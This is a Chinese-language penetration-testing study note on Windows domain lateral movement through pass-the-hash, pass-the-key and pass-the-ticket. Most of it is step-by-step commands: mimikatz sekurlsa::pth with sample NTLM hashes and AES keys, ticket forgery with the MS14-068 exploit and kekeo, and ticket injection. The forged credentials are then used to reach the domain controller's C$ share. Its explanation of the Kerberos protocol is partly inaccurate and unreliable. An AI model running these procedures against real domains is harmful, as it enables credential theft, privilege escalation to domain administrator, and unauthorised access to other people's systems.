知識點
Kerberos協議具體工作方法,在域中:
客戶機將明文密碼進行NTLM雜湊,然後和時間戳一起加密(使用krbtgt密碼hash作為金鑰),傳送給kdc(域控),kdc對使用者進行檢測,成功之後建立TGT(Ticket-Granting Ticket)。
將TGT進行加密簽名返回給客戶機器,只有域使用者krbtgt才能讀取kerberos中TGT資料。
然後客戶機將TGT傳送給域控制器KDC請求TGS(票證授權服務)票證,並且對TGT進行檢測。
檢測成功之後,將目標服務賬戶的NTLM以及TGT進行加密,將加密後的結果返回給客戶機。
PTH(pass the hash) :利用lm或ntlm值進行滲透測試
PTT(pass the ticket):利用票價憑證TGT進行滲透測試 (票據類比cookie)
PTK(pass the key):利用的ekeys ase256進行滲透測試
補丁資訊透過“systeminfo”檢視
PTH和PTK
PTH在內網滲透中是一種很經典的攻擊方式,原理就是攻擊者可以直接透過LM Hash和NTLM Hash訪問遠端主機或服務,而不用提供明文密碼。
如果禁用了ntlm認證,PsExec無法利用獲得的ntlm hash進行遠端連線,但是使用mimikatz還是可以攻擊成功。對於8.1/2012r2,安裝補丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash來實現ptk攻擊
總結:KB2871997補丁後的影響
pth:沒打補丁使用者都可以連線,打了補丁只能administrator連線
ptk:打了補丁才能使用者都可以連線,採用aes256連線
https://www.freebuf.com/column/220740.html
PTT
PTT攻擊的部分就不是簡單的NTLM認證了,它是利用Kerberos協議進行攻擊的,這裡就介紹三種常見的攻擊方法:MS14-068,Golden ticket,SILVER ticket,簡單來說就是將連線合法的票據注入到記憶體中實現連線。
MS14-068基於漏洞,Golden ticket(黃金票據),SILVER ticket(白銀票據)
其中Golden ticket(黃金票據),SILVER ticket(白銀票據)屬於許可權維持技術
MS14-068造成的危害是允許域內任何一個普通使用者,將自己提升至域管許可權。微軟給出的補丁是kb3011780 ;
域橫向移動PTH傳遞-mimikatz
1、獲取許可權
privilege::debug
2、PTH ntlm傳遞
3、在未打補丁的工作組及域連線:
sekurlsa::pth /user:[使用者名稱] /domain:[域名或“workgroup”] /ntlm:[ntlm的值]
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
成功會自動建立一個cmd,可以透過該cmd操作對應使用者名稱的機器,如
4、檢視C盤目錄
dir \192.168.3.21\c$
5、IP地址不識別可以換成計算機名
注意:攻擊時我們不知道IP、計算機名與使用者名稱對應的情況,所以這是隨即攻擊,需要再測試看是哪個IP、計算機名對應的電腦被攻擊了
“domain”的值為“workgroup”時,連線的是本地使用者
域橫向移動PTK傳遞-mimikatz
1、PTK aes256傳遞
打補丁後的工作組及域連線:
2、獲取許可權
privilege::debug
3、獲取aes值
sekurlsa::ekeys
4、連線
sekurlsa::pth /user:[使用者名稱] /domain:[域名或“workgroup”] /aes256:[aes256的值]
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e……
域橫向移動PTT傳遞-ms14068&kekeo&本地
第一種利用漏洞ms14-068
能實現普通使用者直接獲取域控system許可權
MS14-068 powershell執行
1.檢視當前sid
whoami /user
2.啟動mimikatz,不需要提升許可權,能用就行
清空當前機器中所有憑證,如果有域成員憑證會影響憑證偽造
kerberos::purge
檢視當前機器憑證
kerberos::list
將票據注入到記憶體中
kerberos::ptc [票據檔案]
3.利用ms14-068生成TGT資料
ms14-068.exe -u [域成員名]@[域名] -s [sid] -d [域控IP地址] -p [域成員密碼]
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 - p admin!@#45
4.票據注入記憶體
kerberos::ptc TGT_mary@god.org.ccache
5. 檢視憑證列表
klist
6.利用
dir \192.168.3.21\c$
第二種利用工具kekeo
1.生成票據
.\kekeo "tgt::ask /user:[域成員名] /domain:[域名] /ntlm:[ntlm值]"
.\kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695d……"
2.匯入票據
kerberos::ptt [票據檔案]
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.檢視憑證
klist
4.利用net use載入
dir \192.168.3.21\c$
第三種利用本地票據(需管理許可權)
利用mimikatz收集本地票據,再將票據匯入到記憶體中進行連線。有存活時間限制
privilege::debug
sekurlsa::tickets /export
kerberos::ptt [票據檔案]
總結:ptt傳遞不需本地管理員許可權,連線時主機名連線,基於漏洞、工具、本地票據
國產Ladon內網殺器測試驗收
資訊收集-協議掃描-漏洞探針-傳遞攻擊等
“Wiki”介面有命令介紹
資訊收集
GUI:“scan”介面選“scan”,“OnlinePC”介面右鍵選“OnlinePC”掃描
命令列:Ladon [網段] [關鍵詞]
涉及資源:
Kerberos協議工作原理:https://blog.csdn.net/qq_32005671/article/details/54862678
KB22871997是否真的能防禦PTH攻擊?:https://www.freebuf.com/column/220740.html
Ladon:https://github.com/k8gege/Ladon
Ladon 9.1.1 & CobaltStrike神龍外掛釋出:http://k8gege.org/Ladon/cs911.html
kekeo:https://github.com/gentilkiwi/kekeo
WindowsExploits/MS14-068:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068